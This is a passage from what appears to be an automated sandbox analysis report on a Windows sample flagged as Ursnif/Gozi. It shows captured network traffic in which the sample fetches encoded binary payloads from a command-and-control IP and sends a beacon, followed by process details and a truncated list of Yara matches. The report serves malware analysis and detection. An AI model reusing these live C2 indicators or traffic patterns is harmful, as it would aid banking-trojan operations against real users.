Oct 11, 2022 15:04:22.861350060 CEST	1572	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 30 0d 0a ea eb 34 fa 2b a2 fc 1b 01 4d 6f e8 ab 03 d9 71 2c f5 b6 fd b0 34 8f 38 87 65 58 b7 be 74 2f c5 8f cb 81 8c 87 37 24 b2 f7 ca 8a d4 8e 6a 70 a0 99 f3 20 c2 3c da 24 d9 51 da c9 18 44 a7 3b 98 49 0e 48 aa 37 6e 6b 12 e8 bd e1 60 88 cb 83 b0 20 9e 7e f6 f6 29 6b 6e e7 ab e3 f7 9b 7d f7 f8 67 46 b8 1c 02 e3 75 66 25 fc fc 15 f5 7d 13 42 4e 1e 3a cf 01 e0 ac 74 fc 8b bd b0 c9 36 88 e9 82 d3 05 55 e9 43 c4 62 f0 57 a2 cd 01 6f d7 54 50 ca 22 b5 81 cd 98 70 62 a6 a1 15 13 30 7a 39 5f c5 31 45 f2 54 6f a1 38 6c 90 64 d9 37 79 d3 0d 0a 30 0d 0a 0d 0a Data Ascii: b04+Moq,48eXt/7$jp <$QD;IH7nk` ~)kn}gFuf%}BN:t6UCbWoTP"pb0z9_1ETo8ld7y0
Oct 11, 2022 15:04:22.868494987 CEST	1573	OUT	GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:04:23.082669020 CEST	1574	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:23 GMT Content-Type: application/octet-stream Content-Length: 181405 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569d70f027.bin" Data Raw: 77 cb f2 ef ac ff 08 91 16 18 ee e3 e3 67 7b dc 6d 1e 1b 98 69 1d 6e a9 f9 35 71 f4 6b 19 ec be c4 6b ac 18 fa c6 45 1e 9f db 70 45 a0 04 a6 6d 1a b1 51 e1 f5 99 09 f6 91 13 ef f9 b1 70 5a 88 82 35 2b 90 e5 ec 1b 56 c3 d0 a2 fc db 07 e4 84 53 cb 07 f4 9a 7b 88 d3 c8 60 32 2f 76 84 20 05 f1 ee 0d 6e cb 9a ba ce a5 8a ee 1e 74 45 cc 38 37 68 c1 8d 9f 0f 7b 10 84 53 46 73 a7 bf d6 7c d7 ee 52 26 45 38 06 3a 86 1f 6b 16 65 6a 7b a5 64 dc cd 68 04 ac 25 38 3e ce 93 e7 15 b7 f1 58 c0 bb 07 10 f9 c8 74 8c c0 72 39 75 d8 69 ee 81 7a ab b8 32 cd e8 8a 0c 80 62 61 ca 0c 21 93 69 80 27 31 1b 62 cd 44 77 fa 24 cb a5 7b 1b 2e 6a 9d df 99 43 53 2f 7e 29 a7 ed 3f 09 4f b8 43 5e 92 99 e5 78 25 d4 a9 12 bc 32 a3 60 1d 42 0e cc 66 a7 83 81 d6 79 fd a7 79 27 c8 a4 b3 9a 2a 18 8a de 2c 20 91 18 94 6c c3 e1 09 51 12 ee 2a 88 c0 b4 7b 9f 26 6d 7b d4 a2 d4 ef 7d 50 69 48 b2 8c 87 85 ec 3d 56 92 e9 56 14 e4 42 3a 50 76 4e 12 83 9b dd c8 07 72 42 9f 2a c8 08 03 a3 70 ba e2 ca be b9 5b 99 4b 66 f3 fc de 34 e3 69 c2 9e 2c c7 ca 25 31 73 13 a8 40 56 16 04 09 b8 ba d4 f0 e5 25 71 e7 08 e0 73 2b a8 c2 c2 f3 4c a3 23 48 fe 79 f0 f8 8e ad 81 bc 96 c2 1e bd 56 84 69 bd 19 5e f4 04 d8 6e d7 f5 c9 b1 f0 af 1c 0c 9f cf fe c6 09 7a 59 4b c3 e5 ac 1d ae 7a 90 6d 58 05 d4 92 b3 7f 5e 88 62 0f 84 e4 20 c4 46 47 f0 a2 86 0d a3 cd d8 00 eb 7f ee 60 ab 84 db 99 91 0d 0f 4c da f3 82 bf d6 d7 5d ef 4e 17 f1 75 c0 c0 4e 96 5d 34 59 cf 7e fd 18 58 3f e1 ca 8c d5 b3 a5 cb 7a 39 10 34 c0 50 c4 e6 08 23 53 67 cc 56 8b 5c 87 2e e8 77 5a 6f c5 f9 07 fe 6f 7a 05 09 59 e6 f9 0f 7c 16 73 10 d2 1a d9 ab 5f f7 ed 6b f9 20 e7 3d 7e 84 c9 64 71 b4 33 8f 81 1f 2a 43 99 32 eb 62 78 bb 0b 29 a4 e8 ce 23 bc d0 ea bc ee 69 43 ee 90 9c 39 83 69 0a e0 70 de 2c 17 80 4d fa 19 ef c3 6f 7a d5 95 2a 76 7a 36 c6 ab 54 d3 95 3b 40 a5 34 04 11 54 a6 ab 69 6b fe 06 88 37 4f 4a db cd fe 7f ea 17 a4 38 1c 3b a0 3f 7e f2 d0 b8 f6 36 d2 b2 d9 36 8f 4e b9 a0 de d1 79 2b 6c 7f 6f 2c 24 d4 e3 0c c6 3f 5f d1 77 b9 d4 9c 31 9c 02 40 da e6 bd f0 d2 0f 99 60 78 db 6e 43 43 23 e6 ab ce d9 e3 5d d1 7c 0f 31 3d 8b 85 33 20 0c d5 88 66 61 54 1b 0a b1 4d 32 3e d3 ba 57 c0 fe 93 60 61 21 53 ff d2 5e 61 a0 ac 01 d4 17 82 8b 7c 79 b3 76 0c d1 37 25 75 af 24 39 4a f4 de aa ed e1 31 0a 57 dd 33 0d 46 25 7e b9 a9 a5 eb 71 0a d8 68 2c 9e 1f 48 70 b1 81 7f 4e 0c 6d cf 06 30 6f 2a 9f b3 78 db 01 8d ac a7 b4 2e de 9e 88 52 a8 ed 9d 04 1a 56 a3 d9 51 a0 92 af ce 3f c6 fe ec 38 c2 94 69 cf 68 3d 4d af 28 81 c6 17 34 3b bb 9f c3 22 50 ed fd 4e e0 11 39 8e a4 da f0 eb f7 de 19 fc 62 f0 22 db e5 f1 4f bc 78 f1 7a d4 99 3c 78 88 9e 3d 40 ab c4 25 bd f5 50 2b 97 ca a7 24 87 91 5e d1 88 62 6e 2f 6b ec 70 dc 5d f9 91 12 45 ee 1d 79 e8 6a 6a c6 5d 78 72 e8 1b 19 54 63 d8 2f f3 2e 26 ef 25 ea 29 46 91 8b c2 24 ef 06 c4 ab 9c 26 1a 75 d4 da 3d 0d b3 75 5e f4 ce 33 bb f1 60 23 75 ac 29 fd Data Ascii: wg{min5qkkEpEmQpZ5+VS{`2/v ntE87h{SFs\|R&E8:kej{dh%8>Xtr9uiz2ba!i'1bDw${.jCS/~)?OC^x%2`Bfyy', lQ{&m{}PiH=VVB:PvNrBp[Kf4i,%1s@V%qs+L#HyVi^nzYKzmX^b FG`L]NuN]4Y~X?z94P#SgV\.wZoozY\|s_k =~dq3C2bx)#iC9ip,Mozvz6T;@4Tik7OJ8;?~66Ny+lo,$?_w1@`xnCC#]\|1=3 faTM2>W`a!S^a\|yv7%u$9J1W3F%~qh,HpNm0ox.RVQ?8ih=M(4;"PN9b"Oxz<x=@%P+$^bn/kp]Eyjj]xrTc/.&%)F$&u=u^3`#u)
Oct 11, 2022 15:04:23.082703114 CEST	1575	IN	Data Raw: 61 0c ee d6 57 58 bb 18 00 4f 22 63 bd 0a 2f 5e fc fd 8c 01 d1 46 75 c4 86 e6 ae 88 70 f0 e4 e5 a7 d0 88 40 fd fa c6 fc 92 8d 8c 6e 86 05 30 33 7c 2f 65 50 ef f8 3d 5e e7 3e 8e 00 23 e6 42 5a eb 47 a3 83 ae 7f a5 45 41 a7 47 04 e9 70 d2 70 a1 f9 Data Ascii: aWXO"c/^Fup@n03\|/eP=^>#BZGEAGpprZ:REYh6}Rf&D]AB,6xLUf@$hgwK5gkYEUYU]*O[6fQ7VrX")vNh+ TbOzeJ]VV_
Oct 11, 2022 15:04:23.082732916 CEST	1577	IN	Data Raw: 70 93 68 2e 88 8f 25 f2 14 80 a9 a9 c2 1f 7a 1f e2 d7 07 35 34 36 d3 e2 26 6a 64 6e a0 ec 4e ba 42 b9 b4 ff 3d 17 67 3a 93 bb 2b 8e 41 9b 86 6d e1 88 34 de cf 60 0e 95 69 0a 36 2a fb e9 f8 2c 42 b4 10 41 ca 12 6d 5f 09 86 3f c4 80 45 25 01 d6 3f Data Ascii: ph.%z546&jdnNB=g:+Am4`i6*,BAm_?E%?D?)EDi?-RBKn!`f_tf@>[W.lsUOuj'xe@.SBm+dtE(zE9e?# \IBy
Oct 11, 2022 15:04:23.082746983 CEST	1577	IN	Data Raw: 29 3e 3d 5a 4a 6e 52 c3 5c 6d 43 62 0e 78 4f 18 09 3f d2 e1 37 a3 94 1b 17 28 48 11 6a 31 75 6d 44 a2 db a5 ce 29 1c 74 1e 19 0d 03 1d 90 de a0 df 58 0b 46 77 ec d0 59 e9 89 1d cf 66 45 88 46 38 ba 34 f0 2b 96 fa f2 35 b4 52 fc 52 c8 3e 73 68 a8 Data Ascii: )>=ZJnR\mCbxO?7(Hj1umD)tXFwYfEF84+5RR>sh+y~>VPp_rS-haxX1Dnp>F=f{^wHH(H6:i_#Y!L>F{NOB.=Aj,$'u}@+l]s+
Oct 11, 2022 15:04:23.083323002 CEST	1579	IN	Data Raw: 53 60 a1 c4 27 cf 74 31 90 a5 88 6d b7 62 2c 7d 62 f8 2d ba 3e 5a 6b 04 f2 dc 4f d7 13 fd e3 17 03 c4 78 89 c0 89 ab da 1a 69 ae 0c 7c 9b 45 62 56 a7 fd 6f 06 e6 05 81 2f 8f f5 1d fe d7 50 b1 59 46 7d d6 d5 be 4a f4 b0 6c 6f c1 16 75 88 6b a4 e4 Data Ascii: S`'t1mb,}b->ZkOxi\|EbVo/PYF}Jloukm9F3MLHm/@S3@H+C$5t$k:m5hR4kvCc$#fMUu\Oomh\V9RTKaTB~T[(W`iB%_'9-JF
Oct 11, 2022 15:04:23.083343983 CEST	1580	IN	Data Raw: a8 21 b4 fb af 43 b6 25 42 52 96 b5 86 00 57 17 a1 10 13 f2 c4 2f 9d c4 52 8d 22 4a f7 ff 82 ad 44 b3 cb b4 84 07 27 4c 7e d8 00 e2 5a 74 a9 64 95 46 7e 54 3f 5e 7a f3 27 32 9f bb 2d 6d 4d a1 57 0c 94 ac cd c7 22 46 0b 4d 97 54 cd 7b 63 24 cf 94 Data Ascii: !C%BRW/R"JD'L~ZtdF~T?^z'2-mMW"FMT{c$`Bm3T VRQ,FRRxI/"gsB'y[Hy\vK6x\6@L8vJ*;+W\&k\|s5^yvInw4J
Oct 11, 2022 15:04:23.083369970 CEST	1581	IN	Data Raw: 14 09 d8 c5 fd 4b c2 d0 2f 75 89 ad ce ae 80 9f 56 21 b0 4e ab 51 38 7f d3 88 f7 b1 c7 6a 10 03 74 e4 f9 67 bc 60 32 fd e4 70 fe 90 d8 18 99 5d 88 49 74 e0 b3 f8 e1 68 62 36 62 d9 35 9d a2 0c 30 dd 44 01 90 5c 9c 0c 73 2c 93 35 fb cb 4d b6 07 69 Data Ascii: K/uV!NQ8jtg`2p]Ithb6b50D\s,5Mi[O#u+uLpllli*":B"a8lo7%ZCy_QpdUN{RZTe_,vRfKZ@%@>V@cK
Oct 11, 2022 15:04:23.083379984 CEST	1582	IN	Data Raw: 93 ea 1d 47 02 2b 18 89 ea f0 e8 8a 4e 14 b7 ac ee 82 4e 09 ba 6e 9f 75 df 1a 21 c0 9a 55 60 46 d6 b2 03 53 91 09 1a 4a 5b 7d b1 79 21 b7 3d 68 ac 7d f8 cf c2 c8 5c 71 6f 41 3e a3 ba fb 1f 70 97 55 df 20 32 50 d5 f3 4e bc 1c ce 03 4f 79 ba eb de Data Ascii: G+NNnu!U`FSJ[}y!=h}\qoA>pU 2PNOyg8nwY?.RMAVALw8(bBgb:'}]# zYbe+=!:[zuJ=` 6N#M}tYi`Phri"+C ik#h?XT/)u
Oct 11, 2022 15:04:23.088053942 CEST	1583	IN	Data Raw: 23 cb 1c 36 97 ee 30 ae dd 65 6f 05 d4 e7 af 78 fa 23 72 41 92 ae b9 1e 64 16 27 7c d9 53 50 33 aa 19 41 4c eb 56 c0 0f 5a b7 ce 7e 76 db d5 55 2e a4 44 51 d8 d9 ca 44 7b 72 0f cd 54 8d 34 c6 c1 9f 8a 3f 6d 43 a5 48 95 9d 9f 99 c5 43 2f fe cb b8 Data Ascii: #60eox#rAd'\|SP3ALVZ~vU.DQD{rT4?mCHC/SxhLZ%_2/X,}-FyWjB@#0`*SjLA)@YbgDyNZAu`J0qq3\j[]kNu
Oct 11, 2022 15:04:23.088078022 CEST	1584	IN	Data Raw: 4e 1f ae 53 5c 19 5b e5 b8 bc 47 e8 d0 d9 a3 48 f1 34 ca 4c 8e f9 81 ef 13 cb 16 d2 2f f8 2e ef b7 58 34 ea 07 4e 67 3c 8d 30 d6 ea 2b 7c 0d cb 8e a1 ad b8 ea f1 ec 01 2a fe f7 2e 0e 99 fc 40 34 a8 95 4f 2e c8 e1 f8 92 63 9b ad f3 86 30 79 87 bb Data Ascii: NS\[GH4L/.X4Ng<0+\|*.@4O.c0yG\\l=v2,gKg}<}S1>xCy_>q;&W-ck<QS{wh+^Qth8.><)W'[:T,Zf@ '&@-x4
Oct 11, 2022 15:04:23.109144926 CEST	1586	IN	Data Raw: 3c 52 9e 38 3e d4 66 ae 5b 5a 30 e7 c0 03 12 13 1e 99 66 ad e7 a3 de bf a7 26 a2 51 c7 f6 bd 7c 1e de c8 7e 34 a5 9c 11 68 14 05 4b 58 fc c3 65 bf 7c 56 83 27 21 75 f3 20 fa f3 22 0f 45 f0 c4 e7 de cc 04 34 90 ea 5f 02 c4 a7 e7 51 e4 5b 25 fb a0 Data Ascii: <R8>f[Z0f&Q\|~4hKXe\|V'!u "E4_Q[%h+e9)Xl~prXQI$K*6YTi+4 bn?"l7`gtY5j6yY'C<:D2&4Nhr<{%/7W<T[
Oct 11, 2022 15:04:23.184079885 CEST	1768	OUT	GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:04:23.350198984 CEST	1769	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:23 GMT Content-Type: application/octet-stream Content-Length: 233105 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569d7506ff.bin" Data Raw: b0 de 4f 49 3e 24 d7 25 8f 5f 32 cb 68 d0 f4 93 af f0 7f 50 64 1d fb 9c 51 47 b4 37 b4 c3 b3 f2 09 f9 64 44 05 e5 ed 84 78 d9 45 a6 f9 2d 18 c3 5e 5f df 2b 4c ec 3b ba 3d 44 d0 f2 1a d5 df f7 0d 15 3c b7 8e c0 c2 ff d0 0b da e3 7f 42 b0 bf 11 3d 60 17 af d1 a5 4d ad 0b 70 61 cc 77 74 11 55 8f 1c 17 3d d4 b3 56 52 46 4e 66 ae 4b 1d ea 18 a4 f3 0d fc 81 df 1c 6a 05 49 87 38 b8 e9 c6 29 5d 1e b3 68 5f f8 47 25 64 f8 47 da 6d cc 5b cb f9 42 9c 04 17 3f a7 ec 18 cd 62 cf 82 99 f3 48 a5 bb 22 98 d4 c5 1c 82 3a 97 e8 c4 11 d7 61 fd 67 7b 08 6b c8 25 98 15 11 9b c6 cb 2f 74 c8 f0 67 8c 07 36 69 01 b2 51 56 e2 22 39 2d 64 a1 a3 56 c5 7a 4e b8 6d fa d7 f7 c4 94 70 17 fe c5 d9 c3 2d e4 6f 2c 4a 36 3b 4f 85 b9 a3 df 9c 3d 04 fd d3 2c b6 7b 89 27 ac eb 85 f5 f2 e3 78 73 f8 06 00 c8 88 01 62 35 a3 49 2b 3b 5c 4e 6d cc 08 67 53 dc 87 49 e7 ec b7 8a a1 7e 10 6f 4c dc 49 93 d6 eb b7 64 5e 93 9f aa 84 8f a5 9c 17 84 5d cf 4e a1 55 c0 02 92 70 13 68 c7 9c b9 10 e5 1a 0d cf 2f 16 b7 4f d4 ce c5 1f 93 14 44 e1 5f 49 3d 92 54 11 76 9a c0 93 8b 67 f4 9c ba 8e 29 f6 21 3f d1 46 59 45 65 df 09 41 9e 95 10 08 ab 9b 38 39 bd f9 00 3f 33 34 af 87 7f b0 b8 3b 5b 62 5d 51 f1 e7 ec f0 43 62 b0 05 12 4b 11 f7 c0 43 0f 9f 49 39 c9 03 18 6f 1f dc 85 84 44 72 ce 2e e4 89 16 88 6c 1a 74 67 8b 40 13 f2 4c 14 b4 7a 9c 74 28 dc c8 ca 10 59 2b 6c cc bd 4b 3b f7 0b 17 1b d8 95 c0 37 94 91 d6 ec 50 94 e7 e8 2c 28 cc 7c f8 15 b0 75 c5 cb 93 31 fd 15 9e 25 7c 53 8b da e8 55 e7 67 f1 0b 3c 65 cc bf dd 0f 0d ea 79 ed 3a 68 a0 4c 3b 61 da f5 58 70 a0 89 9f 18 39 7d 1b b9 8f 8d 49 0d e4 65 4a 67 03 46 e2 e4 4b b3 65 f7 2d 0f 68 84 37 ba e3 d1 50 41 bc 62 4e b0 1b 4a f5 6c 6b 1f 26 c4 3a 0a a5 26 5a 4f 35 35 d3 ad 2d c7 01 b8 64 f5 da 25 9f d5 5a d6 f8 ab f8 d5 14 f6 9a 28 06 aa 55 80 9f 2a 51 6f cc 4d af 2a 88 bc f2 50 72 11 b5 7e e0 3b b8 f7 5f 5f f5 52 32 a3 be 70 4c 79 0a d8 45 5c b5 5b ca 11 2f 10 dd 20 02 f0 9e 2b 61 58 a2 58 98 51 bd b5 ba aa 6d 16 b7 12 8a 07 75 37 de c4 03 e4 5f 5e 3d fd 36 10 b5 43 5c e0 01 56 e1 69 af 3f a8 f6 01 19 4b 9d 5d 94 d4 2c 37 be 8d bb ea f5 d2 46 4e 2e 9d 07 42 f7 c9 05 4c 79 69 7e f5 a9 8e a9 34 5c 91 55 a1 97 56 63 b2 7e fd 01 72 7f 16 b1 9e df 83 ab 19 a5 9d 43 66 d2 f2 90 15 4f 7d 97 52 6c 3d c1 99 d4 0e c6 85 de f4 8c 29 66 fa 7b e5 9d 2e fa cf e5 86 ad 8f 34 42 ea 1f f6 8f 87 88 25 b0 fb 5e 42 65 a6 82 8e c1 a1 7c 2e fa cf 17 fb 88 77 32 ec e0 75 c5 0b 65 89 7e 8a d0 90 a4 19 db 19 80 d2 da c9 94 9d 11 cf 6c f6 ac 34 14 70 80 1d c1 e5 6e 38 a6 10 cb 18 cf 1a 7b 55 a6 0d 0b cf 05 40 55 cf 4b dd 45 12 dd 52 63 66 02 f2 08 80 62 e0 47 33 a0 5c 15 24 ee cb a4 d7 8d 34 d7 b2 ca 46 31 f9 d2 13 ca 33 8d ff 2d c2 b6 a9 f8 35 db 75 29 4a b5 06 3d 3e 8d de 11 39 f7 7d 71 0f 0a 3d d8 76 46 8a a3 9a 12 1d 80 0a dd 7d f3 0b d4 d3 ec 0e 76 4a de 0c c6 1e d6 89 e4 f7 eb 62 85 14 d0 f8 4c 07 a4 d1 Data Ascii: OI>$%_2hPdQG7dDxE-^_+L;=D<B=`MpawtU=VRFNfKjI8)]h_G%dGm[B?bH":ag{k%/tg6iQV"9-dVzNmp-o,J6;O=,{'xsb5I+;\NmgSI~oLId^]NUph/OD_I=Tvg)!?FYEeA89?34;[b]QCbKCI9oDr.ltg@Lzt(Y+lK;7P,(\|u1%\|SUg<ey:hL;aXp9}IeJgFKe-h7PAbNJlk&:&ZO55-d%Z(UQoMPr~;__R2pLyE\[/ +aXXQmu7_^=6C\Vi?K],7FN.BLyi~4\UVc~rCfO}Rl=)f{.4B%^Be\|.w2ue~l4pn8{U@UKERcfbG3\$4F13-5u)J=>9}q=vF}vJbL
Oct 11, 2022 15:05:22.646934032 CEST	2020	OUT	GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Content-Length: 54 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0
Oct 11, 2022 15:05:22.864103079 CEST	2021	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Lx6.exePID: 1172, Parent PID: 3528

General

Target ID:	0
Start time:	15:01:17
Start date:	11/10/2022
Path:	C:\Users\user\Desktop\Lx6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Lx6.exe
Imagebase:	0x400000
File size:	38400 bytes
MD5 hash:	3B892BEA0F8CBE0B61EE380743567D1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe 